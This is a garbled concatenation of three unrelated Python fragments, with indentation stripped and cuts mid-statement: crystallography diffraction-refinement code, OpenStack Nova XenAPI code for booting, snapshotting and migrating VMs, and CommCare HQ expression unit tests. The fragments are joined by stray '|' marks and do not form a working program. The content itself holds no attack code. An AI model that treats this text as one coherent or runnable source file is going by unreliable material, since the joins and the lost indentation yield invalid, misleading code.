center=centers.Nabc[ii], beta=betas.Nabc[ii])
P.add(p)
# diffuse gamma and sigma
p = ParameterType(init=init.diffuse_gamma[ii], sigma=sigma.diffuse_gamma[ii],
minval=mins.diffuse_gamma[ii], maxval=maxs.diffuse_gamma[ii],
fix=fix_difgam[ii], name="diffuse_gamma%d" % (ii,),
center=centers.diffuse_gamma[ii], beta=betas.diffuse_gamma[ii])
P.add(p)
p = ParameterType(init=init.diffuse_sigma[ii], sigma=sigma.diffuse_sigma[ii],
minval=mins.diffuse_sigma[ii], maxval=maxs.diffuse_sigma[ii],
fix=fix_difsig[ii], name="diffuse_sigma%d" % (ii,),
center=centers.diffuse_sigma[ii], beta=betas.diffuse_sigma[ii])
P.add(p)
# mosaic spread (mosaicity)
p = ParameterType(init=init.eta_abc[ii], sigma=sigma.eta_abc[ii],
minval=mins.eta_abc[ii], maxval=maxs.eta_abc[ii],
fix=fix_eta[ii], name="eta_abc%d" % (ii,),
center=centers.eta_abc[ii], beta=betas.eta_abc[ii])
P.add(p)
ucell_man = utils.manager_from_crystal(self.E.crystal)
ucell_vary_perc = self.params.ucell_edge_perc / 100.
for i_uc, (name, val) in enumerate(zip(ucell_man.variable_names, ucell_man.variables)):
if "Ang" in name:
minval = val - ucell_vary_perc * val
maxval = val + ucell_vary_perc * val
if centers.ucell is not None:
cent = centers.ucell[i_uc]
beta = betas.ucell[i_uc]
else:
if name == 'a_Ang':
cent = centers.ucell_a
beta = betas.ucell_a
elif name== 'b_Ang':
cent = centers.ucell_b
beta = betas.ucell_b
else:
cent = centers.ucell_c
beta = betas.ucell_c
assert cent is not None, "Set the center restraints properly!"
assert beta is not None
else:
val_in_deg = val * 180 / np.pi
minval = (val_in_deg - self.params.ucell_ang_abs) * np.pi / 180.
maxval = (val_in_deg + self.params.ucell_ang_abs) * np.pi / 180.
if centers.ucell is not None:
cent = centers.ucell[i_uc]*np.pi / 180.
beta = betas.ucell[i_uc]
else:
if name=='alpha_rad':
cent = centers.ucell_alpha
beta = betas.ucell_alpha
elif name=='beta_rad':
cent = centers.ucell_beta
beta = betas.ucell_beta
else:
cent = centers.ucell_gamma
beta = betas.ucell_gamma
assert cent is not None
assert beta is not None
cent = cent*np.pi / 180.
p = ParameterType(init=val, sigma=sigma.ucell[i_uc],
minval=minval, maxval=maxval, fix=fix.ucell,
name="ucell%d" % (i_uc,),
center=cent,
beta=beta)
MAIN_LOGGER.info(
"Unit cell variable %s (currently=%f) is bounded by %f and %f" % (name, val, minval, maxval))
P.add(p)
self.SIM.ucell_man = ucell_man
p = ParameterType(init=init.detz_shift*1e-3, sigma=sigma.detz_shift,
minval=mins.detz_shift*1e-3, maxval=maxs.detz_shift*1e-3,
fix=fix.detz_shift,name="detz_shift",
center=centers.detz_shift,
beta=betas.detz_shift)
P.add(p)
self.set_slices("roi_id") # this creates roi_id_unique
refls_have_scales = "scale_factor" in list(self.refls.keys())
for roi_id in self.roi_id_unique:
if refls_have_scales:
slc = self.roi_id_slices[roi_id][0]
refl_idx = int(self.all_refls_idx[slc][0])
init_scale = self.refls[refl_idx]["scale_factor"]
else:
init_scale = 1
p = ParameterType(init=init_scale, sigma=self.params.sigmas.roiPerScale,
minval=0, maxval=1e12,
fix=fix.perRoiScale, name="scale_roi%d" % roi_id,
center=1,
beta=1e12)
P.add(p)
self.SIM.P = P
# TODO , fix this attribute hacking
self.SIM.roi_id_unique = self.roi_id_unique
self.SIM.roi_id_slices = self.roi_id_slices
def get_data_model_pairs(self):
if self.best_model is None:
raise ValueError("cannot get the best model, there is no best_model attribute")
all_dat_img, all_mod_img = [], []
all_trusted = []
all_bragg = []
for i_roi in range(len(self.rois)):
x1, x2, y1, y2 = self.rois[i_roi]
mod = self.best_model[self.roi_id == i_roi].reshape((y2 - y1, x2 - x1))
if self.all_trusted is not None:
trusted = self.all_trusted[self.roi_id == i_roi].reshape((y2 - y1, x2 - x1))
all_trusted.append(trusted)
else:
all_trusted.append(None)
dat = self.all_data[self.roi_id == i_roi].reshape((y2 - y1, x2 - x1))
all_dat_img.append(dat)
if self.all_background is not None:
bg = self.all_background[self.roi_id == i_roi].reshape((y2-y1, x2-x1))
if self.best_model_includes_background:
all_bragg.append(mod-bg)
all_mod_img.append(mod)
else:
all_bragg.append(mod)
all_mod_img.append(mod+bg)
else: # assume mod contains background
all_mod_img.append(mod)
all_bragg.append(None)
return all_dat_img, all_mod_img, all_trusted, all_bragg
def Minimize(self, x0):
target = TargetFunc(SIM=self.SIM, niter_per_J=self.params.niter_per_J, profile=self.params.profile)
# set up the refinement flags
vary = np.ones(len(x0), bool)
assert len(x0) == len(self.SIM.P)
for p in self.SIM.P.values():
if not p.refine:
vary[p.xpos] = False
target.vary = vary # fixed flags
target.x0 = np.array(x0, np.float64) # initial full parameter list
x0_for_refinement = target.x0[vary]
if self.params.method is None:
method = "Nelder-Mead"
else:
method = self.params.method
maxfev = None
if self.params.nelder_mead_maxfev is not None:
maxfev = self.params.nelder_mead_maxfev * self.npix_total
at_min = target.at_minimum
if method in ["L-BFGS-B", "BFGS", "CG", "dogleg", "SLSQP", "Newton-CG", "trust-ncg", "trust-krylov", "trust-exact", "trust-ncg"]:
if self.SIM.P["RotXYZ0_xtal0"].refine:
self.SIM.D.refine(ROTX_ID)
self.SIM.D.refine(ROTY_ID)
self.SIM.D.refine(ROTZ_ID)
if self.SIM.P["Nabc0"].refine:
self.SIM.D.refine(NCELLS_ID)
if self.SIM.P["ucell0"].refine:
for i_ucell in range(len(self.SIM.ucell_man.variables)):
self.SIM.D.refine(UCELL_ID_OFFSET + i_ucell)
if self.SIM.P["eta_abc0"].refine:
self.SIM.D.refine(ETA_ID)
if self.SIM.P["detz_shift"].refine:
self.SIM.D.refine(DETZ_ID)
if self.SIM.D.use_diffuse:
self.SIM.D.refine(DIFFUSE_ID)
args = (self.SIM, self.pan_fast_slow, self.all_data,
self.all_sigmas, self.all_trusted, self.all_background, True, self.params, True)
min_kwargs = {'args': args, "method": method, "jac": target.jac,
'hess': self.params.hess}
if method=="L-BFGS-B":
min_kwargs["options"] = {"ftol": self.params.ftol, "gtol": 1e-10, "maxfun":1e5, "maxiter":self.params.lbfgs_maxiter}
else:
args = (self.SIM, self.pan_fast_slow, self.all_data,
self.all_sigmas, self.all_trusted, self.all_background, True, self.params, False)
min_kwargs = {'args': args, "method": method,
'options': {'maxfev': maxfev,
'fatol': self.params.nelder_mead_fatol}}
if self.params.global_method=="basinhopping":
HOPPER = basinhopping
out = HOPPER(target, x0_for_refinement,
niter=self.params.niter,
minimizer_kwargs=min_kwargs,
T=self.params.temp,
callback=at_min,
disp=False,
stepsize=self.params.stepsize)
else:
bounds = [(-100,100)] * len(x0_for_refinement) # TODO decide about bounds, usually x remains close to 1 during refinement
print("Beginning the annealing process")
args = min_kwargs.pop("args")
if self.params.dual.no_local_search:
compute_grads = args[-1]
if compute_grads:
print("Warning, parameters setup to compute gradients, swicthing off because no_local_search=True")
args = list(args)
args[-1] = False # switch off grad
args = tuple(args)
out = dual_annealing(target, bounds=bounds, args=args,
no_local_search=self.params.dual.no_local_search,
x0=x0_for_refinement,
accept=self.params.dual.accept,
visit=self.params.dual.visit,
maxiter=self.params.niter,
local_search_options=min_kwargs,
callback=at_min)
target.x0[vary] = out.x
return target.x0
def model(x, SIM, pfs, compute_grad=True):
#params_per_xtal = np.array_split(x[:num_per_xtal_params], SIM.num_xtals)
# get the unit cell variables
nucell = len(SIM.ucell_man.variables)
ucell_params = [SIM.P["ucell%d" % i_uc] for i_uc in range(nucell)]
ucell_xpos = [p.xpos for p in ucell_params]
unitcell_var_reparam = [x[xpos] for xpos in ucell_xpos]
unitcell_variables = [ucell_params[i].get_val(xval) for i, xval in enumerate(unitcell_var_reparam)]
SIM.ucell_man.variables = unitcell_variables
Bmatrix = SIM.ucell_man.B_recipspace
SIM.D.Bmatrix = Bmatrix
if compute_grad:
for i_ucell in range(len(unitcell_variables)):
SIM.D.set_ucell_derivative_matrix(
i_ucell + UCELL_ID_OFFSET,
SIM.ucell_man.derivative_matrices[i_ucell])
# update the mosaicity here
eta_params = [SIM.P["eta_abc%d" % i_eta] for i_eta in range(3)]
if SIM.umat_maker is not None:
# we are modeling mosaic spread
eta_abc = [p.get_val(x[p.xpos]) for p in eta_params]
if not SIM.D.has_anisotropic_mosaic_spread:
eta_abc = eta_abc[0]
SIM.update_umats_for_refinement(eta_abc)
# detector parameters
DetZ = SIM.P["detz_shift"]
x_shiftZ = x[DetZ.xpos]
shiftZ = DetZ.get_val(x_shiftZ)
SIM.D.shift_origin_z(SIM.detector, shiftZ)
# Mosaic block
Nabc_params = [SIM.P["Nabc%d" % (i_n,)] for i_n in range(3)]
Na, Nb, Nc = [n_param.get_val(x[n_param.xpos]) for n_param in Nabc_params]
if SIM.D.isotropic_ncells:
Nb = Na
Nc = Na
SIM.D.set_ncells_values(tuple([Na, Nb, Nc]))
# diffuse signals
if SIM.D.use_diffuse:
diffuse_params_lookup = {}
iso_flags = {'gamma':SIM.isotropic_diffuse_gamma, 'sigma':SIM.isotropic_diffuse_sigma}
for diff_type in ['gamma', 'sigma']:
diff_params = [SIM.P["diffuse_%s%d" % (diff_type,i_gam)] for i_gam in range(3)]
diffuse_params_lookup[diff_type] = diff_params
diff_vals = []
for i_diff, param in enumerate(diff_params):
val = param.get_val(x[param.xpos])
if iso_flags[diff_type]:
diff_vals = [val]*3
break
else:
diff_vals.append(val)
if diff_type == "gamma":
SIM.D.diffuse_gamma = tuple(diff_vals)
else:
SIM.D.diffuse_sigma = tuple(diff_vals)
npix = int(len(pfs) / 3)
nparam = len(x)
J = None
if compute_grad:
J = np.zeros((nparam, npix)) # gradients
model_pix = None
model_pix_noRoi = None
# extract the scale factors per ROI, these might correspond to structure factor intensity scale factors, and quite possibly might result in overfits!
roiScalesPerPix = 1
if SIM.P["scale_roi0"].refine:
perRoiParams = [SIM.P["scale_roi%d" % roi_id] for roi_id in SIM.roi_id_unique]
perRoiScaleFactors = [p.get_val(x[p.xpos]) for p in perRoiParams]
roiScalesPerPix = np.zeros(npix)
for i_roi, roi_id in enumerate(SIM.roi_id_unique):
slc = SIM.roi_id_slices[roi_id][0]
roiScalesPerPix[slc] = perRoiScaleFactors[i_roi]
for i_xtal in range(SIM.num_xtals):
SIM.D.raw_pixels_roi *= 0
RotXYZ_params = [SIM.P["RotXYZ%d_xtal%d" % (i_rot, i_xtal)] for i_rot in range(3)]
rotX,rotY,rotZ = [rot_param.get_val(x[rot_param.xpos]) for rot_param in RotXYZ_params]
## update parameters:
# TODO: if not refining Umat, assert these are 0 , and dont set them here
SIM.D.set_value(ROTX_ID, rotX)
SIM.D.set_value(ROTY_ID, rotY)
SIM.D.set_value(ROTZ_ID, rotZ)
G = SIM.P["G_xtal%d" % i_xtal]
scale = G.get_val(x[G.xpos])
SIM.D.add_diffBragg_spots(pfs)
pix_noRoiScale = SIM.D.raw_pixels_roi[:npix]
pix_noRoiScale = pix_noRoiScale.as_numpy_array()
pix = pix_noRoiScale * roiScalesPerPix
if model_pix is None:
model_pix = scale*pix
model_pix_noRoi = scale*pix_noRoiScale
else:
model_pix += scale*pix
model_pix_noRoi += scale*pix_noRoiScale
if compute_grad:
if G.refine:
scale_grad = pix # TODO double check multi crystal case
scale_grad = G.get_deriv(x[G.xpos], scale_grad)
J[G.xpos] += scale_grad
if RotXYZ_params[0].refine:
for i_rot in range(3):
rot_grad = scale * SIM.D.get_derivative_pixels(ROTXYZ_IDS[i_rot]).as_numpy_array()[:npix]
rot_p = RotXYZ_params[i_rot]
rot_grad = rot_p.get_deriv(x[rot_p.xpos], rot_grad)
J[rot_p.xpos] += rot_grad
if Nabc_params[0].refine:
Nabc_grads = SIM.D.get_ncells_derivative_pixels()
for i_n in range(3):
N_grad = scale*(Nabc_grads[i_n][:npix].as_numpy_array())
p = Nabc_params[i_n]
N_grad = p.get_deriv(x[p.xpos], N_grad)
J[p.xpos] += N_grad
if SIM.D.isotropic_ncells:
break
if SIM.D.use_diffuse:
for t in ['gamma','sigma']:
if diffuse_params_lookup[t][0].refine:
diffuse_grads = getattr(SIM.D,"get_diffuse_%s_derivative_pixels"%t)()
for i_diff | |
userdevice += 1
else:
if instance.auto_disk_config:
LOG.debug(_("Auto configuring disk, attempting to "
"resize partition..."), instance=instance)
instance_type = db.instance_type_get(ctx,
instance.instance_type_id)
VMHelper.auto_configure_disk(self._session,
first_vdi_ref,
instance_type['root_gb'])
VMHelper.create_vbd(self._session, vm_ref, first_vdi_ref,
userdevice, bootable=True)
# set user device to next free value
# userdevice 1 is reserved for rescue and we've used '0'
userdevice = 2
instance_type = db.instance_type_get(ctx, instance.instance_type_id)
swap_mb = instance_type['swap']
generate_swap = swap_mb and FLAGS.xenapi_generate_swap
if generate_swap:
VMHelper.generate_swap(self._session, instance,
vm_ref, userdevice, swap_mb)
userdevice += 1
ephemeral_gb = instance_type['ephemeral_gb']
if ephemeral_gb:
VMHelper.generate_ephemeral(self._session, instance,
vm_ref, userdevice, ephemeral_gb)
userdevice += 1
# Attach any other disks
for vdi in vdis[1:]:
vdi_ref = self._session.call_xenapi('VDI.get_by_uuid',
vdi['vdi_uuid'])
if generate_swap and vdi['vdi_type'] == 'swap':
# We won't be using it, so don't let it leak
VMHelper.destroy_vdi(self._session, vdi_ref)
continue
VMHelper.create_vbd(self._session, vm_ref, vdi_ref,
userdevice, bootable=False)
userdevice += 1
def _boot_new_instance(self, instance, vm_ref):
"""Boot a new instance and configure it."""
LOG.debug(_('Starting VM'), instance=instance)
self._start(instance, vm_ref)
ctx = nova_context.get_admin_context()
agent_build = db.agent_build_get_by_triple(ctx, 'xen',
instance.os_type, instance.architecture)
if agent_build:
LOG.info(_('Latest agent build for %(hypervisor)s/%(os)s'
'/%(architecture)s is %(version)s') % agent_build)
else:
LOG.info(_('No agent build found for %(hypervisor)s/%(os)s'
'/%(architecture)s') % {
'hypervisor': 'xen',
'os': instance.os_type,
'architecture': instance.architecture})
# Wait for boot to finish
LOG.debug(_('Waiting for instance state to become running'),
instance=instance)
expiration = time.time() + FLAGS.xenapi_running_timeout
while time.time() < expiration:
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
break
greenthread.sleep(0.5)
# Update agent, if necessary
# This also waits until the agent starts
LOG.debug(_("Querying agent version"), instance=instance)
version = self._get_agent_version(instance)
if version:
LOG.info(_('Instance agent version: %s'), version,
instance=instance)
if (version and agent_build and
cmp_version(version, agent_build['version']) < 0):
LOG.info(_('Updating Agent to %s'), agent_build['version'],
instance=instance)
self._agent_update(instance, agent_build['url'],
agent_build['md5hash'])
# if the guest agent is not available, configure the
# instance, but skip the admin password configuration
no_agent = version is None
# Inject files, if necessary
injected_files = instance.injected_files
if injected_files:
# Check if this is a JSON-encoded string and convert if needed.
if isinstance(injected_files, basestring):
try:
injected_files = json.loads(injected_files)
except ValueError:
LOG.exception(_("Invalid value for injected_files: %r"),
injected_files, instance=instance)
injected_files = []
# Inject any files, if specified
for path, contents in instance.injected_files:
LOG.debug(_("Injecting file path: '%s'") % path,
instance=instance)
self.inject_file(instance, path, contents)
admin_password = instance.admin_pass
# Set admin password, if necessary
if admin_password and not no_agent:
LOG.debug(_("Setting admin password"), instance=instance)
self.set_admin_password(instance, admin_password)
# Reset network config
LOG.debug(_("Resetting network"), instance=instance)
self.reset_network(instance, vm_ref)
# Set VCPU weight
inst_type = db.instance_type_get(ctx, instance.instance_type_id)
vcpu_weight = inst_type['vcpu_weight']
if vcpu_weight is not None:
LOG.debug(_("Setting VCPU weight"), instance=instance)
self._session.call_xenapi('VM.add_to_VCPUs_params', vm_ref,
'weight', str(vcpu_weight))
def _get_vm_opaque_ref(self, instance):
vm_ref = VMHelper.lookup(self._session, instance['name'])
if vm_ref is None:
raise exception.NotFound(_('Could not find VM with name %s') %
instance['name'])
return vm_ref
def _acquire_bootlock(self, vm):
"""Prevent an instance from booting."""
self._session.call_xenapi(
"VM.set_blocked_operations",
vm,
{"start": ""})
def _release_bootlock(self, vm):
"""Allow an instance to boot."""
self._session.call_xenapi(
"VM.remove_from_blocked_operations",
vm,
"start")
def snapshot(self, context, instance, image_id):
"""Create snapshot from a running VM instance.
:param context: request context
:param instance: instance to be snapshotted
:param image_id: id of image to upload to
Steps involved in a XenServer snapshot:
1. XAPI-Snapshot: Snapshotting the instance using XenAPI. This
creates: Snapshot (Template) VM, Snapshot VBD, Snapshot VDI,
Snapshot VHD
2. Wait-for-coalesce: The Snapshot VDI and Instance VDI both point to
a 'base-copy' VDI. The base_copy is immutable and may be chained
with other base_copies. If chained, the base_copies
coalesce together, so, we must wait for this coalescing to occur to
get a stable representation of the data on disk.
3. Push-to-glance: Once coalesced, we call a plugin on the XenServer
that will bundle the VHDs together and then push the bundle into
Glance.
"""
template_vm_ref = None
try:
_snapshot_info = self._create_snapshot(instance)
template_vm_ref, template_vdi_uuids = _snapshot_info
# call plugin to ship snapshot off to glance
VMHelper.upload_image(context,
self._session, instance, template_vdi_uuids, image_id)
finally:
if template_vm_ref:
self._destroy(instance, template_vm_ref,
destroy_kernel_ramdisk=False)
LOG.debug(_("Finished snapshot and upload for VM"),
instance=instance)
def _create_snapshot(self, instance):
#TODO(sirp): Add quiesce and VSS locking support when Windows support
# is added
LOG.debug(_("Starting snapshot for VM"), instance=instance)
vm_ref = self._get_vm_opaque_ref(instance)
label = "%s-snapshot" % instance.name
try:
template_vm_ref, template_vdi_uuids = VMHelper.create_snapshot(
self._session, instance, vm_ref, label)
return template_vm_ref, template_vdi_uuids
except self.XenAPI.Failure, exc:
LOG.error(_("Unable to Snapshot instance: %(exc)s"), locals(),
instance=instance)
raise
def _migrate_vhd(self, instance, vdi_uuid, dest, sr_path):
instance_uuid = instance['uuid']
params = {'host': dest,
'vdi_uuid': vdi_uuid,
'instance_uuid': instance_uuid,
'sr_path': sr_path}
try:
_params = {'params': pickle.dumps(params)}
self._session.call_plugin('migration', 'transfer_vhd',
_params)
except self.XenAPI.Failure:
msg = _("Failed to transfer vhd to new host")
raise exception.MigrationError(reason=msg)
def _get_orig_vm_name_label(self, instance):
return instance.name + '-orig'
def _update_instance_progress(self, context, instance, step, total_steps):
"""Update instance progress percent to reflect current step number
"""
# FIXME(sirp): for now we're taking a KISS approach to instance
# progress:
# Divide the action's workflow into discrete steps and "bump" the
# instance's progress field as each step is completed.
#
# For a first cut this should be fine, however, for large VM images,
# the _create_disks step begins to dominate the equation. A
# better approximation would use the percentage of the VM image that
# has been streamed to the destination host.
progress = round(float(step) / total_steps * 100)
instance_uuid = instance['uuid']
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
db.instance_update(context, instance_uuid, {'progress': progress})
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type):
"""Copies a VHD from one host machine to another, possibly
resizing filesystem before hand.
:param instance: the instance that owns the VHD in question.
:param dest: the destination host machine.
:param disk_type: values are 'primary' or 'cow'.
"""
# 0. Zero out the progress to begin
self._update_instance_progress(context, instance,
step=0,
total_steps=RESIZE_TOTAL_STEPS)
vm_ref = self._get_vm_opaque_ref(instance)
# The primary VDI becomes the COW after the snapshot, and we can
# identify it via the VBD. The base copy is the parent_uuid returned
# from the snapshot creation
base_copy_uuid = cow_uuid = None
template_vdi_uuids = template_vm_ref = None
try:
# 1. Create Snapshot
_snapshot_info = self._create_snapshot(instance)
template_vm_ref, template_vdi_uuids = _snapshot_info
self._update_instance_progress(context, instance,
step=1,
total_steps=RESIZE_TOTAL_STEPS)
base_copy_uuid = template_vdi_uuids['image']
_vdi_info = VMHelper.get_vdi_for_vm_safely(self._session, vm_ref)
vdi_ref, vm_vdi_rec = _vdi_info
cow_uuid = vm_vdi_rec['uuid']
sr_path = VMHelper.get_sr_path(self._session)
if (instance['auto_disk_config'] and
instance['root_gb'] > instance_type['root_gb']):
# Resizing disk storage down
old_gb = instance['root_gb']
new_gb = instance_type['root_gb']
LOG.debug(_("Resizing down VDI %(cow_uuid)s from "
"%(old_gb)dGB to %(new_gb)dGB"), locals(),
instance=instance)
# 2. Power down the instance before resizing
self._shutdown(instance, vm_ref, hard=False)
self._update_instance_progress(context, instance,
step=2,
total_steps=RESIZE_TOTAL_STEPS)
# 3. Copy VDI, resize partition and filesystem, forget VDI,
# truncate VHD
new_ref, new_uuid = VMHelper.resize_disk(self._session,
instance,
vdi_ref,
instance_type)
self._update_instance_progress(context, instance,
step=3,
total_steps=RESIZE_TOTAL_STEPS)
# 4. Transfer the new VHD
self._migrate_vhd(instance, new_uuid, dest, sr_path)
self._update_instance_progress(context, instance,
step=4,
total_steps=RESIZE_TOTAL_STEPS)
# Clean up VDI now that it's been copied
VMHelper.destroy_vdi(self._session, new_ref)
vdis = {'base_copy': new_uuid}
else:
# Resizing disk storage up, will be handled on destination
# As an optimization, we transfer the base VDI first,
# then shut down the VM, followed by transfering the COW
# VDI.
# 2. Transfer the base copy
self._migrate_vhd(instance, base_copy_uuid, dest, sr_path)
self._update_instance_progress(context, instance,
step=2,
total_steps=RESIZE_TOTAL_STEPS)
# 3. Now power down the instance
self._shutdown(instance, vm_ref, hard=False)
self._update_instance_progress(context, instance,
step=3,
total_steps=RESIZE_TOTAL_STEPS)
# 4. Transfer the COW VHD
self._migrate_vhd(instance, cow_uuid, dest, sr_path)
self._update_instance_progress(context, instance,
step=4,
total_steps=RESIZE_TOTAL_STEPS)
# TODO(mdietz): we could also consider renaming these to
# something sensible so we don't need to blindly pass
# around dictionaries
vdis = {'base_copy': base_copy_uuid, 'cow': cow_uuid}
# NOTE(sirp): in case we're resizing to the same host (for dev
# purposes), apply a suffix to name-label so the two VM records
# extant until a confirm_resize don't collide.
name_label = self._get_orig_vm_name_label(instance)
VMHelper.set_vm_name_label(self._session, vm_ref, name_label)
finally:
if template_vm_ref:
self._destroy(instance, template_vm_ref,
destroy_kernel_ramdisk=False)
return vdis
def _move_disks(self, instance, disk_info):
"""Move and possibly link VHDs via the XAPI plugin."""
base_copy_uuid = disk_info['base_copy']
new_base_copy_uuid = str(uuid.uuid4())
params = {'instance_uuid': instance['uuid'],
'sr_path': VMHelper.get_sr_path(self._session),
'old_base_copy_uuid': base_copy_uuid,
'new_base_copy_uuid': new_base_copy_uuid}
if 'cow' in disk_info:
cow_uuid = disk_info['cow']
new_cow_uuid = str(uuid.uuid4())
params['old_cow_uuid'] = cow_uuid
params['new_cow_uuid'] = new_cow_uuid
new_uuid = new_cow_uuid
else:
new_uuid = new_base_copy_uuid
self._session.call_plugin('migration', 'move_vhds_into_sr',
{'params': pickle.dumps(params)})
# Now we rescan the SR so we find the VHDs
VMHelper.scan_default_sr(self._session)
# Set name-label so we can find if we need to clean | |
}
},
"value_expression": {
"type": "named",
"name": "test_named_expression"
}
},
context=factory_context
)
expression2 = ExpressionFactory.from_spec(
{
"type": "nested",
"argument_expression": {
"type": "array_index",
"array_expression": {
"type": "property_name",
"property_name": "indices"
},
"index_expression": {
"type": "constant",
"constant": 1
}
},
"value_expression": {
"type": "named",
"name": "test_named_expression"
}
},
context=factory_context
)
self.assertEqual(expression1(doc, evaluation_context), 'my_parent_id')
self.assertEqual(expression2(doc, evaluation_context), 'my_parent_id2')
class IteratorExpressionTest(SimpleTestCase):
def setUp(self):
self.spec = {
"type": "iterator",
"expressions": [
{
"type": "property_name",
"property_name": "p1"
},
{
"type": "property_name",
"property_name": "p2"
},
{
"type": "property_name",
"property_name": "p3"
},
],
"test": {}
}
self.expression = ExpressionFactory.from_spec(self.spec)
def test_basic(self):
self.assertEqual([1, 2, 3], self.expression({'p1': 1, 'p2': 2, 'p3': 3}))
def test_missing_values_default(self):
self.assertEqual([1, 2, None], self.expression({'p1': 1, 'p2': 2}))
def test_missing_values_filtered(self):
spec = copy.copy(self.spec)
spec['test'] = {
'type': 'boolean_expression',
'expression': {
'type': 'identity',
},
'operator': 'not_eq',
'property_value': None,
}
expression = ExpressionFactory.from_spec(spec)
self.assertEqual([1, 2], expression({'p1': 1, 'p2': 2}))
self.assertEqual([1, 3], expression({'p1': 1, 'p3': 3}))
self.assertEqual([1], expression({'p1': 1}))
self.assertEqual([], expression({}))
def test_missing_and_filtered(self):
spec = copy.copy(self.spec)
spec['test'] = {
"type": "not",
"filter": {
'type': 'boolean_expression',
'expression': {
'type': 'identity',
},
'operator': 'in',
'property_value': ['', None],
}
}
expression = ExpressionFactory.from_spec(spec)
self.assertEqual([1], expression({'p1': 1, 'p2': ''}))
def test_type_coercion(self):
spec = copy.copy(self.spec)
spec['expressions'] = [
'2018-01-01',
{
'type': 'constant',
'constant': '2018-01-01',
'datatype': 'date',
},
]
expression = ExpressionFactory.from_spec(spec)
self.assertEqual([date(2018, 1, 1), date(2018, 1, 1)], expression({}))
class RootDocExpressionTest(SimpleTestCase):
def setUp(self):
spec = {
"type": "root_doc",
"expression": {
"type": "property_name",
"property_name": "base_property"
}
}
self.expression = ExpressionFactory.from_spec(spec)
def test_missing_context(self):
self.assertEqual(None, self.expression({
"base_property": "item_value"
}))
def test_not_in_context(self):
self.assertEqual(
None,
self.expression(
{"base_property": "item_value"},
context=EvaluationContext({}, 0)
)
)
def test_comes_from_context(self):
self.assertEqual(
"base_value",
self.expression(
{"base_property": "item_value"},
context=EvaluationContext({"base_property": "base_value"}, 0)
)
)
class RelatedDocExpressionTest(SimpleTestCase):
def setUp(self):
# we have to set the fake database before any other calls
self.patch_cases_database()
self.spec = {
"type": "related_doc",
"related_doc_type": "CommCareCase",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "property_name",
"property_name": "related_property"
}
}
self.expression = ExpressionFactory.from_spec(self.spec)
self.nested_expression = ExpressionFactory.from_spec({
"type": "related_doc",
"related_doc_type": "CommCareCase",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "related_doc",
"related_doc_type": "CommCareCase",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "property_name",
"property_name": "related_property"
}
}
})
def patch_cases_database(self):
def get_case(self_, case_id):
doc = self.database.get(case_id)
if doc is None:
raise CaseNotFound
return Config(to_json=lambda: doc)
get_case_patch = patch.object(CaseAccessors, "get_case", get_case)
get_case_patch.start()
self.addCleanup(get_case_patch.stop)
self.database = {}
def test_simple_lookup(self):
related_id = 'related-id'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'test-domain',
'related_property': 'foo'
}
self.database = {
'my-id': my_doc,
related_id: related_doc
}
self.assertEqual('foo', self.expression(my_doc, EvaluationContext(my_doc, 0)))
def test_related_doc_not_found(self):
doc = {'parent_id': 'some-missing-id', 'domain': 'whatever'}
self.assertEqual(None, self.expression(doc, EvaluationContext(doc, 0)))
def test_cross_domain_lookups(self):
related_id = 'cross-domain-id'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'wrong-domain',
'related_property': 'foo'
}
self.database = {
'my-id': my_doc,
related_id: related_doc
}
self.assertEqual(None, self.expression(my_doc, EvaluationContext(my_doc, 0)))
def test_nested_lookup(self):
related_id = 'nested-id-1'
related_id_2 = 'nested-id-2'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'test-domain',
'parent_id': related_id_2,
'related_property': 'foo',
}
related_doc_2 = {
'domain': 'test-domain',
'related_property': 'bar',
}
self.database = {
'my-id': my_doc,
related_id: related_doc,
related_id_2: related_doc_2
}
self.assertEqual('bar', self.nested_expression(my_doc, EvaluationContext(my_doc, 0)))
def test_nested_lookup_cross_domains(self):
related_id = 'cross-nested-id-1'
related_id_2 = 'cross-nested-id-2'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'test-domain',
'parent_id': related_id_2,
'related_property': 'foo',
}
related_doc_2 = {
'domain': 'wrong-domain',
'related_property': 'bar',
}
self.database = {
'my-id': my_doc,
related_id: related_doc,
related_id_2: related_doc_2
}
self.assertEqual(None, self.nested_expression(my_doc, EvaluationContext(my_doc, 0)))
def test_fail_on_bad_doc_type(self):
spec = {
"type": "related_doc",
"related_doc_type": "BadDocument",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "property_name",
"property_name": "related_property"
}
}
with self.assertRaises(BadSpecError):
ExpressionFactory.from_spec(spec)
def test_caching(self):
self.test_simple_lookup()
my_doc = self.database.get('my-id')
context = EvaluationContext(my_doc, 0)
self.assertEqual('foo', self.expression(my_doc, context))
my_doc = self.database.get('my-id')
self.database.clear()
self.assertEqual('foo', self.expression(my_doc, context))
class RelatedDocExpressionDbTest(TestCase):
domain = 'related-doc-db-test-domain'
def test_form_lookups(self):
form = create_and_save_a_form(domain=self.domain)
expression = self._get_expression('XFormInstance')
doc = self._get_doc(form.form_id)
self.assertEqual(form.form_id, expression(doc, EvaluationContext(doc, 0)))
def test_case_lookups(self):
case_id = uuid.uuid4().hex
create_and_save_a_case(domain=self.domain, case_id=case_id, case_name='related doc test case')
expression = self._get_expression('CommCareCase')
doc = self._get_doc(case_id)
self.assertEqual(case_id, expression(doc, EvaluationContext(doc, 0)))
def test_other_lookups(self):
user_id = uuid.uuid4().hex
CommCareUser.get_db().save_doc({'_id': user_id, 'domain': self.domain})
expression = self._get_expression('CommCareUser')
doc = self._get_doc(user_id)
self.assertEqual(user_id, expression(doc, EvaluationContext(doc, 0)))
@staticmethod
def _get_expression(doc_type):
return ExpressionFactory.from_spec({
"type": "related_doc",
"related_doc_type": doc_type,
"doc_id_expression": {
"type": "property_name",
"property_name": "related_id"
},
"value_expression": {
"type": "property_name",
"property_name": "_id"
}
})
@classmethod
def _get_doc(cls, id):
return {
'related_id': id,
'domain': cls.domain,
}
@generate_cases([
